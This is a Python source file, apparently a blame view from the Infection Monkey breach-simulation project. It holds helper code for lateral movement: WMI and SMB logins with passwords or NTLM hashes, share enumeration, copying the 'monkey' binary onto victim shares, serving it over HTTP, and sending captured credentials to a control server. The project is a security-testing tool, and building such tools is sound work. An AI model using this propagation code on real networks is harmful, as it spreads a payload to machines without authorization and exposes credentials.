monkey/chaos_monkey/exploit/tools.py

490 lines
16 KiB
Python
Raw Normal View History

2017-10-03 23:20:20 +08:00
import logging
import ntpath
2015-08-30 15:27:35 +08:00
import os
2017-10-03 23:20:20 +08:00
import os.path
import pprint
import socket
import struct
2017-10-03 23:20:20 +08:00
import sys
import urllib
from difflib import get_close_matches
2017-10-03 23:20:20 +08:00
2015-08-30 15:27:35 +08:00
from impacket.dcerpc.v5 import transport, srvs
2017-10-03 23:20:20 +08:00
from impacket.dcerpc.v5.dcom import wmi
2015-08-30 15:27:35 +08:00
from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dtypes import NULL
2017-10-03 23:20:20 +08:00
from impacket.smb3structs import SMB2_DIALECT_002, SMB2_DIALECT_21
from impacket.smbconnection import SMBConnection, SMB_DIALECT
import monkeyfs
from network import local_ips
from network.firewall import app as firewall
from network.info import get_free_tcp_port, get_routes
from transport import HTTPServer
2016-01-13 16:27:49 +08:00
class DceRpcException(Exception):
pass
2015-08-30 15:27:35 +08:00
2015-08-30 15:27:35 +08:00
__author__ = 'itamar'
LOG = logging.getLogger(__name__)
2015-11-30 16:56:20 +08:00
2015-08-30 15:27:35 +08:00
class AccessDeniedException(Exception):
def __init__(self, host, username, password, domain):
super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" %
(host, domain, username, password))
class WmiTools(object):
class WmiConnection(object):
def __init__(self):
self._dcom = None
self._iWbemServices = None
@property
def connected(self):
return self._dcom is not None
def connect(self, host, username, password, domain=None, lmhash="", nthash=""):
if not domain:
domain = host.ip_addr
dcom = DCOMConnection(host.ip_addr,
username=username,
password=password,
domain=domain,
lmhash=lmhash,
nthash=nthash,
oxidResolver=True)
try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
wmi.IID_IWbemLevel1Login)
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
dcom.disconnect()
if "rpc_s_access_denied" == exc.message:
raise AccessDeniedException(host, username, password, domain)
raise
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
try:
self._iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
self._dcom = dcom
except:
dcom.disconnect()
raise
finally:
iWbemLevel1Login.RemRelease()
def close(self):
assert self.connected, "WmiConnection isn't connected"
self._iWbemServices.RemRelease()
self._iWbemServices = None
self._dcom.disconnect()
self._dcom = None
@staticmethod
def dcom_wrap(func):
def _wrapper(*args, **kwarg):
try:
return func(*args, **kwarg)
finally:
WmiTools.dcom_cleanup()
return _wrapper
@staticmethod
def dcom_cleanup():
for port_map in DCOMConnection.PORTMAPS.keys():
del DCOMConnection.PORTMAPS[port_map]
for oid_set in DCOMConnection.OID_SET.keys():
del DCOMConnection.OID_SET[port_map]
DCOMConnection.OID_SET = {}
DCOMConnection.PORTMAPS = {}
if DCOMConnection.PINGTIMER:
DCOMConnection.PINGTIMER.cancel()
DCOMConnection.PINGTIMER.join()
DCOMConnection.PINGTIMER = None
@staticmethod
def get_object(wmi_connection, object_name):
assert isinstance(wmi_connection, WmiTools.WmiConnection)
assert wmi_connection.connected, "WmiConnection isn't connected"
return wmi_connection._iWbemServices.GetObject(object_name)[0]
@staticmethod
def list_object(wmi_connection, object_name, fields=None, where=None):
assert isinstance(wmi_connection, WmiTools.WmiConnection)
assert wmi_connection.connected, "WmiConnection isn't connected"
if fields:
fields_query = ",".join(fields)
else:
fields_query = "*"
wql_query = "SELECT %s FROM %s" % (fields_query, object_name)
if where:
wql_query += " WHERE %s" % (where,)
2015-08-30 15:27:35 +08:00
LOG.debug("Execution WQL query: %r", wql_query)
iEnumWbemClassObject = wmi_connection._iWbemServices.ExecQuery(wql_query)
query = []
try:
while True:
try:
2016-08-20 22:03:49 +08:00
next_item = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
2015-08-30 15:27:35 +08:00
record = next_item.getProperties()
if not fields:
fields = record.keys()
query_record = {}
for key in fields:
query_record[key] = record[key]['value']
query.append(query_record)
2017-09-26 23:11:13 +08:00
except DCERPCSessionError as exc:
2015-08-30 15:27:35 +08:00
if 1 == exc.error_code:
break
raise
finally:
iEnumWbemClassObject.RemRelease()
return query
2016-08-20 22:03:49 +08:00
2015-08-30 15:27:35 +08:00
class SmbTools(object):
@staticmethod
2017-09-26 23:11:13 +08:00
def copy_file(host, src_path, dst_path, username, password, lm_hash='', ntlm_hash='', timeout=60):
assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,)
2015-08-30 15:27:35 +08:00
config = __import__('config').WormConfiguration
src_file_size = monkeyfs.getsize(src_path)
2015-08-30 15:27:35 +08:00
2017-09-26 23:11:13 +08:00
smb, dialect = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout)
2015-08-30 15:27:35 +08:00
if not smb:
return None
# skip guest users
if smb.isGuestSession() > 0:
2017-09-26 23:11:13 +08:00
LOG.debug("Connection to %r granted guest privileges with user: %s, password: '%s',"
" LM hash: %s, NTLM hash: %s",
host, username, password, lm_hash, ntlm_hash)
2015-08-30 15:27:35 +08:00
2016-08-20 22:03:49 +08:00
try:
smb.logoff()
except:
pass
2015-08-30 15:27:35 +08:00
return None
try:
resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102)
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.debug("Error requesting server info from %r over SMB: %s",
host, exc)
return None
info = {'major_version': resp['InfoStruct']['ServerInfo102']['sv102_version_major'],
'minor_version': resp['InfoStruct']['ServerInfo102']['sv102_version_minor'],
'server_name': resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "),
'server_comment': resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "),
'server_user_path': resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "),
'simultaneous_users': resp['InfoStruct']['ServerInfo102']['sv102_users']}
LOG.debug("Connected to %r using %s:\n%s",
host, dialect, pprint.pformat(info))
try:
resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2)
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.debug("Error enumerating server shares from %r over SMB: %s",
host, exc)
return None
resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer']
high_priority_shares = ()
low_priority_shares = ()
file_name = ntpath.split(dst_path)[-1]
for i in range(len(resp)):
share_name = resp[i]['shi2_netname'].strip("\0 ")
share_path = resp[i]['shi2_path'].strip("\0 ")
current_uses = resp[i]['shi2_current_uses']
max_uses = resp[i]['shi2_max_uses']
if current_uses >= max_uses:
LOG.debug("Skipping share '%s' on victim %r because max uses is exceeded",
share_name, host)
continue
elif not share_path:
LOG.debug("Skipping share '%s' on victim %r because share path is invalid",
share_name, host)
continue
share_info = {'share_name': share_name,
'share_path': share_path}
if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),)
2015-08-30 15:27:35 +08:00
low_priority_shares += ((ntpath.sep + file_name, share_info),)
2015-08-30 15:27:35 +08:00
shares = high_priority_shares + low_priority_shares
file_uploaded = False
for remote_path, share in shares:
share_name = share['share_name']
share_path = share['share_path']
if not smb:
2017-09-26 23:11:13 +08:00
smb, _ = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout)
2015-08-30 15:27:35 +08:00
if not smb:
return None
try:
tid = smb.connectTree(share_name)
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.debug("Error connecting tree to share '%s' on victim %r: %s",
share_name, host, exc)
continue
LOG.debug("Trying to copy monkey file to share '%s' [%s + %s] on victim %r",
share_name, share_path, remote_path, host)
remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep))
# check if file is found on destination
if config.skip_exploit_if_file_exist:
try:
file_info = smb.listPath(share_name, remote_path)
if file_info:
if src_file_size == file_info[0].get_filesize():
LOG.debug("Remote monkey file is same as source, skipping copy")
return remote_full_path
2015-08-30 15:27:35 +08:00
LOG.debug("Remote monkey file is found but different, moving along with attack")
except:
2016-08-20 22:03:49 +08:00
pass # file isn't found on remote victim, moving on
2015-08-30 15:27:35 +08:00
try:
with monkeyfs.open(src_path, 'rb') as source_file:
# make sure of the timeout
smb.setTimeout(timeout)
2015-08-30 15:27:35 +08:00
smb.putFile(share_name, remote_path, source_file.read)
file_uploaded = True
LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
src_path, share_name, share_path, host)
break
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.debug("Error uploading monkey to share '%s' on victim %r: %s",
share_name, host, exc)
continue
finally:
2016-08-20 22:03:49 +08:00
try:
smb.logoff()
except:
pass
2015-08-30 15:27:35 +08:00
smb = None
if not file_uploaded:
LOG.debug("Couldn't find a writable share for exploiting"
2017-09-26 23:11:13 +08:00
" victim %r with username: %s, password: '%s', LM hash: %s, NTLM hash: %s",
host, username, password, lm_hash, ntlm_hash)
2015-08-30 15:27:35 +08:00
return None
return remote_full_path
@staticmethod
2017-09-26 23:11:13 +08:00
def new_smb_connection(host, username, password, lm_hash='', ntlm_hash='', timeout=60):
2015-08-30 15:27:35 +08:00
try:
smb = SMBConnection(host.ip_addr, host.ip_addr, sess_port=445)
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.debug("SMB connection to %r on port 445 failed,"
" trying port 139 (%s)", host, exc)
try:
smb = SMBConnection('*SMBSERVER', host.ip_addr, sess_port=139)
2017-09-26 23:11:13 +08:00
except Exception as exc:
2015-08-30 15:27:35 +08:00
LOG.debug("SMB connection to %r on port 139 failed as well (%s)",
host, exc)
return None, None
dialect = {SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21: "SMBv2.1"}.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked
try:
2017-09-26 23:11:13 +08:00
smb.login(username, password, '', lm_hash, ntlm_hash)
except Exception as exc:
LOG.debug("Error while logging into %r using user: %s, password: '%s', LM hash: %s, NTLM hash: %s: %s",
host, username, password, lm_hash, ntlm_hash, exc)
2015-08-30 15:27:35 +08:00
return None, dialect
smb.setTimeout(timeout)
2015-08-30 15:27:35 +08:00
return smb, dialect
@staticmethod
def execute_rpc_call(smb, rpc_func, *args):
dce = SmbTools.get_dce_bind(smb)
rpc_method_wrapper = getattr(srvs, rpc_func, None)
if not rpc_method_wrapper:
raise ValueError("Cannot find RPC method '%s'" % (rpc_method_wrapper,))
2015-08-30 15:27:35 +08:00
return rpc_method_wrapper(dce, *args)
@staticmethod
def get_dce_bind(smb):
rpctransport = transport.SMBTransport(smb.getRemoteHost(),
smb.getRemoteHost(),
filename=r'\srvsvc',
smb_connection=smb)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
return dce
class HTTPTools(object):
@staticmethod
def create_transfer(host, src_path, local_ip=None, local_port=None):
if not local_port:
local_port = get_free_tcp_port()
if not local_ip:
local_ip = get_interface_to_target(host.ip_addr)
if not firewall.listen_allowed():
return None, None
httpd = HTTPServer(local_ip, local_port, src_path)
httpd.daemon = True
httpd.start()
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
def get_interface_to_target(dst):
if sys.platform == "win32":
2017-10-03 23:20:20 +08:00
return get_close_matches(dst, local_ips())[0]
else:
# based on scapy implementation
def atol(x):
ip = socket.inet_aton(x)
return struct.unpack("!I", ip)[0]
routes = get_routes()
dst = atol(dst)
pathes = []
for d, m, gw, i, a in routes:
aa = atol(a)
if aa == dst:
pathes.append((0xffffffffL, ("lo", a, "0.0.0.0")))
if (dst & m) == (d & m):
pathes.append((m, (i, a, gw)))
if not pathes:
return None
pathes.sort()
ret = pathes[-1][1]
return ret[1]
def get_target_monkey(host):
from control import ControlClient
import platform
import sys
if host.monkey_exe:
return host.monkey_exe
if not host.os.get('type'):
return None
monkey_path = ControlClient.download_monkey_exe(host)
if host.os.get('machine') and monkey_path:
host.monkey_exe = monkey_path
if not monkey_path:
if host.os.get('type') == platform.system().lower():
# if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe
if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \
2016-08-20 22:03:49 +08:00
host.os.get('machine', '').lower() == platform.machine().lower():
monkey_path = sys.executable
2016-07-26 23:52:58 +08:00
return monkey_path
2017-09-04 19:52:24 +08:00
2017-09-03 16:50:01 +08:00
def get_target_monkey_by_os(is_windows, is_32bit):
from control import ControlClient
return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit)
2016-07-26 23:52:58 +08:00
2017-09-04 19:52:24 +08:00
def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None):
2016-07-26 23:52:58 +08:00
cmdline = ""
2017-09-04 19:52:24 +08:00
if parent is not None:
cmdline += " -p " + parent
if tunnel is not None:
cmdline += " -t " + tunnel
if server is not None:
cmdline += " -s " + server
if depth is not None:
if depth < 0:
depth = 0
cmdline += " -d %d" % depth
2017-08-31 22:50:55 +08:00
if location is not None:
cmdline += " -l %s" % location
2016-07-26 23:52:58 +08:00
return cmdline
2017-09-04 19:52:24 +08:00
def build_monkey_commandline(target_host, depth, location=None):
from config import GUID
return build_monkey_commandline_explicitly(
GUID, target_host.default_tunnel, target_host.default_server, depth, location)
2017-09-26 23:11:13 +08:00
def report_failed_login(exploiter, machine, user, password='', lm_hash='', ntlm_hash=''):
from control import ControlClient
2017-10-03 23:20:20 +08:00
telemetry_dict = \
2017-09-26 23:11:13 +08:00
{'result': False, 'machine': machine.__dict__, 'exploiter': exploiter.__class__.__name__,
'user': user, 'password': password}
2017-09-29 00:03:31 +08:00
if lm_hash:
2017-09-26 23:11:13 +08:00
telemetry_dict['lm_hash'] = lm_hash
2017-09-29 00:03:31 +08:00
if ntlm_hash:
2017-09-27 19:28:53 +08:00
telemetry_dict['ntlm_hash'] = ntlm_hash
2017-09-26 23:11:13 +08:00
ControlClient.send_telemetry('exploit', telemetry_dict)
2017-09-04 19:52:24 +08:00
def get_binaries_dir_path():
if getattr(sys, 'frozen', False):
return sys._MEIPASS
else:
return os.path.dirname(os.path.abspath(__file__))